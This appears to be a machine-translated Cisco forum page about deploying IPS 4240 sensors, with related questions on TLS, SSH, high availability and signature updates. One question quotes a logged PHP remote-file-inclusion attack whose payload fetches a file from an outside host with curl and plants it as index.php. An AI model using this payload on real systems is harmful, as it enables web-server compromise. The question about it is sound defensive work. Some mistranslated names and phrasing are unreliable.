Deployment of Cisco IPS 4240 devices

I can't find all the information about the Cisco IPS 4240 features massive deployments. I have 6 devices, I intend to drive to several remote sites and tie in a centralized unit of Cisco MARCH. Without the help of any CSM/LMS software, is there a quick and dirty to pull this off? I think to set up a single IPS appliance, then pull and distribute the configuration file for the remaining devices. I would like to see how others have done this...

If all of your sensors are of the same type (all 4240 to your situation) and will execute all the even correct configuration, then the copy command will help out you.

There is a new feature added to the copy command in IPS 6.1 which will help you during the copying of config of one sensor to another.

Complete you configure a sensor (using IME, IDM or CLI). When you are satisfied with the configuration, and then use the command copy to copy ON a server of SCP.

Now bringup a second sensor and configure basic networking through the Installer settings (ip address, gateway, etc...).

Now, use the command copy to copy the first configuration of sensors from the SCP server in the running of the second probe configuration on the second.

It will ask you to change the network settings on the second probe.

Answer n °

The rest of the configuration of the probe first copy will be placed in the second sensor.

The second sensor will keep its own unique IP address but win the rest of the configuration of the config of the first probe.

Continue to do this with additional sensors.

The process can then be repeated every time that additional changes are made to the first sensor.

Remember though that this only works if the configuration of the probe will be exactly duplicated (including what interfaces would be monitored and how).

If each sensor will have some unique tunings, then you need to manage each sensor on its own or buy CSM which can be used to share only parts of the configuration of multiple sensors.

Tags: Cisco Security

Similar Questions

  • Not entirely taken TLS supported in Cisco IPS 4240

    I am trying to contact a Cisco IPS 4240 device while having security settings FIPS enabled on the client using SSL. This is not possible because the device does not support TLS extensions in the Client Hello packet (RFC 5746) sent by the client when using TLS (SSL3 and lower are not FIPS compatible). The IDM application that communicates with the device does not send these extensions (im seeing this with WireShark) TLS is able to connect to it.

    Is it possible to provide the 4240 support these TLS extensions?

    This is related to the bugs below.  The original solution will be included in the 7.1.5 release which is preparing to take in charge the platform 4240 among others.  This will allow the Web server IPS to ignore short-term extensions.  The long-term solution will require an update to the Web server so that it is fully compliant with RFC 5746.

    http://Tools.Cisco.com/support/BugToolKit/search/getBugDetails.do?method=fetchBugDetails&bugId=CSCtt18382

    http://Tools.Cisco.com/support/BugToolKit/search/getBugDetails.do?method=fetchBugDetails&bugId=CSCtx43502

    Todd

  • Recovery v1 in cisco IPS SSL Session key

    Hi all

    In network audit, I have the comment mentioned by the auditor for cisco IPS 4270 device. but I don't get any solution for the same thing. Kindly help me out on this.

    V1 SSL Session key recovery

    The remote SSH daemon supports connections made

    using the version 1.33 or 1.5 of the SSH

    Protocol. These protocols are not completely

    cryptographically safe so they should not be used.

    With respect,

    Sashi

    Currently there is no way only allow SSH version 2 and disable SSH version 1 on IPS.

    Here is the request for improvement which have been filed for your reference:CSCsk84977

    http://Tools.Cisco.com/support/BugToolKit/search/getBugDetails.do?method=fetchBugDetails&bugId=CSCsk84977

    Hope that answers your question.

  • IPS 4240 high availability?

    Hello

    4240 running in HA mode?

    Or should I look at 4255 if I need to work in HA mode?

    Kindly help me with this info... Thanks in advance.

    Kind regards
    RAM

    Just to add a little bit to Bob's response.  It is possible for the HA, but as mentioned above, it is not HA as you would expect of a firewall and requires significant network planning and is rather technical in nature.

    The best documentation I could find about the designs HA is in chapter 21 - "Deploying Cisco IPS for high availability" and High Performance of Earworms security CCNP 642-627 official Cert Guide, ISBN: 9780132372107.  She gets quite detailed and explains a large number of different methods.

    I was also able to find some information on this site, but it is at a higher level and does not provide as many options.

    https://www.NetworkWorld.com/community/node/18384

    I had to work HA in some of our environments, and I'm here to tell you, plan ahead, far in advance, test several methods to find one that suits.  We were using a method that I just couldn't find it mentioned anywhere.

  • Cisco ips automatically updated link signature?

    Hi all
    I would like to know what address or the link that we need to the IPS-4240 signature automatically update from cisco.
    In our Setup IPS show this link. is this correct?
    Thank you.
    Kind regards
    Budy

    Yes like the following should work

    https://www.Cisco.com/cgi-bin/front.x/IDA/Locator/Locator.pl

    Concerning

    Farrukh

  • Cisco IPS 4200 Signature Update

    We are currently under evaluation and implementation of the Cisco IPS solution to our security needs.

    Our supplier has said that the signature 'online' updates to Cisco IPS is not possible - this is a manual process and we need to charge the device if you want to update the files.

    Somehow, it defies logic. Surely, I think, that any IP address should have the possibility of obtaining signatures updated "online".

    I apologize, because that question is too basic in nature. But could someone shed more light on this?

    Thank you.

    You have auto update functionality of Cisco IPS version 6.0, take a look at the attached picture.

    Update of signatures is * recommended * that you reload the signatures (restart the sensor), although this is not mandatory.

    Our IPS has not been restarted for over two months now and everything is working ok.

    Automatic update

    Automatic update

    Automatic update

  • IPS-4240 design question

    I have two IPS 4240 s that can be placed between our internal network and our extranet firewall. The game of firewall is your pair of standard assets/ASA-5520 switch connected to both switches.

    Q1 - if I'm not worried about atomic attacks, is there another advantage that IPS inline on promiscuity?

    Is Q2 - If inline or promiscuity, necessary to connect the unique IPS for two switches in order to receive packets when a failover of the SAA occurs? If so, does physically or through RSPAN?

    Q3 - if the IPS fails and it is set online, interfaces fail open (traffic continues to pass) or closed (traffic is removed)? I couldn't find that on the Cisco site.

    Thank you!

    "Promiscuous" mode, you can use a 4240 and extend the output of each switch in two interfaces of remote sensing of the 4240 (it has four available). A single 4240 should even be able to set up TCP sessions that span the two rails, as in the case of a failover.

  • IPS-4240 engine upgradation procedure of E3 E4

    Hi all

    Can someone help me to upgrade the IPS 6.0 (1) 7.0 E1 (2) E4.

    What are the images need to be upgraded for this?

    What is the appropriate procedure for upgradation?

    Here is the version for your reference results show...

    ========================================

    Cisco IPS #.

    Cisco-IPS # sh ver
    Application partition:

    Cisco Intrusion Prevention System, Version 1.0000 E3

    Host:
    Domain keys key1.0
    Definition of signature:
    Update of the signing S479.0 2010-03-19
    Virus update V1.4 2007-03-02
    OS version: 2.4.30 - IDS-smp-bigphys
    Platform: IPS-4240-K9
    Serial number: JMX1244L0PK
    License expires: December 31, 2010 UTC
    Sensor time is 211 days.
    With the help of 1439252480 of 1984552960 memory available bytes (72% of use)
    the application data uses 44.0 M off 166,8 M bytes of disk space available (28% of use)
    startup is using 39.7 M off 68.6 M bytes of disk space available (61% of use)

    MainApp to E-2008_OCT_16_16_24 (release) 2008-10-16 T 16: 40:57 - 0500 Running
    AnalysisEngine-E-2008_OCT_16_16_24 (release) 2008-10-16 T 16: 40:57 - 0500 Running
    CLI-E-2008_OCT_16_16_24 (release) 2008-10-16 T 16: 40:57 - 0500

    Upgrade history:

    * IPS - GIS - S465 - req - E3 23:00:43 UTC Thursday, January 28, 2010
    IPS-GIS-S479-req - E3.pkg 00:05:37 UTC Wednesday, April 7, 2010

    Version 1.1 - 1, 0000 E3 recovery partition

    Valid certificate from the host: November 17, 2008 to November 18, 2010

    Cisco IPS #.

    Cisco IPS #.

    =================================

    Kind regards

    Anuj Pratap

    No, do not reimage system (IPS-4240-K9-sys-1.1-a-7.0-2-E4.img), which would eliminate all of your configuration.

    Just perform the upgrade using this upgrade file: IPS-K9-7, 0-2 - E4.pkgand which would automatically be updated to 7.0.2 (E4).

  • IPS-4240 fail open

    Hi all

    I have one unit of IPS-4240. I want to know if my sensor or the unit itself fails / stops, is there an option where in my traffic will be passed so that there is no downtime.

    Thank you

    Pratik

    You can configure the sensor when it is inline with inline-bypass 'auto' mode mode so when the unit does not work, it will just pass through traffic without inspection, however, if the sensor is completely shutdown, then no, the traffic will be dropped when in inline mode.

    Here is more information on derivation inline mode:

    http://www.Cisco.com/en/us/docs/security/IPS/7.0/Configuration/Guide/CLI/cli_interfaces.html#wp1047079

    However, if she is in promiscious mode, so you don't have to worry about this because the package is not "inline" and will cause no disruption.

    Hope that helps.

  • use of 100% of Cisco ips 4270 cpu...

    Hi people I have cisco ips 4270 version 7.0 (2) E3 when I try to access through IDM his show the cpu1 CPU = 100% and 100% = cpu4, but vary cpu1 and cpu2 can you please tell me what will be the solution to this problem...

    When I try to go to the configuration then its give me error... attached document attached please check...

    Hello

    Having 100% on some of your CPU is normal on the platform of the IPS.

    The device uses cycles slowed down it is to prepare for the handling of incoming packets and reduce the delay that it will introduce on their way, then is expected to get even under low load.

    If you want to get a better idea of capacity by % of your IPS you are currently using, you should have a look at the value of the load of the Inspection. Looking at the data that you have provided, you are about 25% at present.

    For the message timeout rdep, it seems to be a software problem. Looking more closely at the image you attached, you can also see "analysis engine status: no answer.

    It is somewhat difficult to troubleshoot those on CSC, so I suggest to prosecute TAC if you want to know the exact origin of cause.

    What I advise is upgraded to the latest code of 7 (0) which is I believe 7.0 E4 (5A), since it is more then likely fixed in this version.

    If you are looking for a quick fix, a reboot of the PPE must erase this but the problem will more then likely return later.

    Kind regards

    Nicolas

  • IPS two devices with the same UUID

    I have two Sourcefire\Cisco IPS sensors deployed and which have been identified as having the same UUID. As you can imagine, this is causing all sorts of questions. Has he never been seen before, and if so is there a solution?

    -------------------[ SENSOR 1]--------------------

    Model: 3 D 7120 (63) Version 5.4.0.4 (Build 55)

    UUID: 46ffa0d8-4907-11e4-8669-d32acdb6a95e

    Version VDB: 258

    ----------------------------------------------------

    ------------------[ SENSOR 2]-----------------

    Model: 3 D 7120 (63) Version 5.4.0.4 (Build 55)

    UUID: 46ffa0d8-4907-11e4-8669-d32acdb6a95e

    Version VDB: 258

    ----------------------------------------------------

    I've not seen this before.

    I guess you have to remove the two sensors, reinstall their software and add to the Management Center.

  • Upgrade version of CISCO IPS signature

    Hi guys:

    Anyone know the process for updating the signature on a CISCO IPS version, I want to do it manually. If somedoy can tell me the orders and all I have to do this.

    Concerning

    Luis;

    Updats manual signature for Cisco IPS sensors can be performed from the CLI as shown here:

    http://www.Cisco.com/en/us/docs/security/IPS/7.0/Configuration/Guide/CLI/cli_system_images.html#wp1142504

    Or from the interface of the IDM as shown here:

    http://www.Cisco.com/en/us/docs/security/IPS/7.0/Configuration/Guide/IDM/idm_sensor_management.html#wp2126670

    This process is also used to upgrade software base of the probe.

    Scott

  • IPS 4240 - additional card

    Hello

    Does anyone know, when will be available 4xFE cards for IPS-4240 (for total 8 interfaces)?

    Kind regards

    Krzysztof

    The option card for IPS-4240/4255 sensors will be a card 4GE to support copper (RJ45) and fiber (SX) connections. It will allow a total of 8 RJ45 interfaces or 4 SX fiber interfaces (and 4 RJ45 interfaces) on these platforms. Unfortunately, it will be probably available for another 9 months or more.

  • List of Cisco IPS Signatures

    Hi guys,.

    I need list of PDF complete cisco ips signatures.

    Can someone help me find a link or a pdf?

    Thank you all,

    JV

    Hello

    I couldn't find any method to export the list of signatures. This could be because there are thousands of them.

    However, you can use the following link to find signatures of details.

    http://Tools.Cisco.com/Security/Center/home.x

    SPSP

  • PHP exploit triggers Cisco Security Agent but NOT at Cisco IPS... why?

    Does anyone know what signing this feat should trigger with the Cisco IPS sensor? You are not sure if there is one, or if we turned it off?

    We see this feat hit our Exchange servers several times during the week.

    The process of "C:\WINNT\System32\inetsrv\inetinfo.exe" (as user NT AUTHORITY\SYSTEM) received the data ' / index2.php? option = com_content & do_pdf = 1 & id = 1index2.php? _REQUEST [option] = com_content & _REQUEST [Itemid] = 1 & GLOBALS = & mosConfig_absolute_path =http://220.194.57.112/~photo/cm?&cmd=cd%20cache;curl%20-O%20http: / / 220.194.57.112/~photo/cm;mv%20cm%20index.php;rm%20-rf%20cm*;uname%20-a%20|%20mail%20-s%20uname_i2_66. 224.194.188%[email protected] / * /; uname%20-a%20|%20Mail%20-s%20uname_i2_66.224.194.188%[email protected] / * /. com; echo |'.

    I think that this could be the exploit of mambo. See http://www.securityfocus.com/archive/1/archive/1/427196/100/0/threaded for the info. I searched on mambo MySDN and found GIS 5163 "Mambo Site Server Administration Password ByPass" here is a snippet of the description: "administrative access is acquired by sending a specific url using the index2.php script and the PHPSESSID variable." This looks like what you pasted. Note "index2.php". Your IPS can not seen this so it was more than 443.

    Hope this helps

    M

Maybe you are looking for